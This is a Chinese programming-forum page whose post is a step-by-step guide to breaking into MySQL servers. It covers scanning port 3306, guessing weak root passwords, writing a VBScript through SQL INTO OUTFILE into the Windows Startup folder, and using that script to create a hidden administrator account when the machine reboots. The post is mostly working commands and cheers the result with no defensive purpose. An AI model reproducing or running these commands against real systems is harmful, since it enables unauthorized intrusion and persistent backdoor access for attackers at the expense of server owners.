Java学习者论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

手机号码,快捷登录

恭喜Java学习者论坛(https://www.javaxxz.com)已经为数万Java学习者服务超过8年了!积累会员资料超过10000G+
成为本站VIP会员,下载本站10000G+会员资源,购买链接:点击进入购买VIP会员
JAVA高级面试进阶视频教程Java架构师系统进阶VIP课程

分布式高可用全栈开发微服务教程

Go语言视频零基础入门到精通

Java架构师3期(课件+源码)

Java开发全终端实战租房项目视频教程

SpringBoot2.X入门到高级使用教程

大数据培训第六期全套视频教程

深度学习(CNN RNN GAN)算法原理

Java亿级流量电商系统视频教程

互联网架构师视频教程

年薪50万Spark2.0从入门到精通

年薪50万!人工智能学习路线教程

年薪50万!大数据从入门到精通学习路线年薪50万!机器学习入门到精通视频教程
仿小米商城类app和小程序视频教程深度学习数据分析基础到实战最新黑马javaEE2.1就业课程从 0到JVM实战高手教程 MySQL入门到精通教程
查看: 1362|回复: 0

3306端口(Mysql使用)入侵

[复制链接]

该用户从未签到

发表于 2011-9-27 13:00:58 | 显示全部楼层 |阅读模式
最近正好看了些PHP+MySQL的东西,所以便思考了一下MySQL入侵的方法.
MySQL的默认端口是3306,首先扫3306端口,再扫弱口令,然后连接,下面主要讲下连接后的操作.

连接到MySQL服务器:

mysql -uroot -h192.168.0.1 -p123456        //root 是密码,192.168.0.1是服务器IP, 123456是密码

查看服务器中有些什么数据库:

mysql>show databases;                          // 分号不能少,mysql默认是用分号结束语句.

MySQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库.

接着进入数据库:

mysql>use test;

进入test数据库中,查看数据库中有哪些数据表:

mysql>show tables;

默认的情况下,test中没有任何表的存在.

在TEST数据库下创建一个新的表:

  mysql>create table a (cmd text);

创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本. 

在表中插入内容:
  mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
  mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 123456$ 123456/add"",0) " );
  mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 123456$ /add"",0) " );
  
现在我们来看看表a中有些什么:

  mysql>select * from a;

输出表为一个VBS的脚本文件
  mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs";

等待重起..over.!

很酷地拿到权限了!Well Done!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|手机版|Java学习者论坛 ( 声明:本站资料整理自互联网,用于Java学习者交流学习使用,对资料版权不负任何法律责任,若有侵权请及时联系客服屏蔽删除 )

GMT+8, 2024-12-23 09:14 , Processed in 0.412497 second(s), 39 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表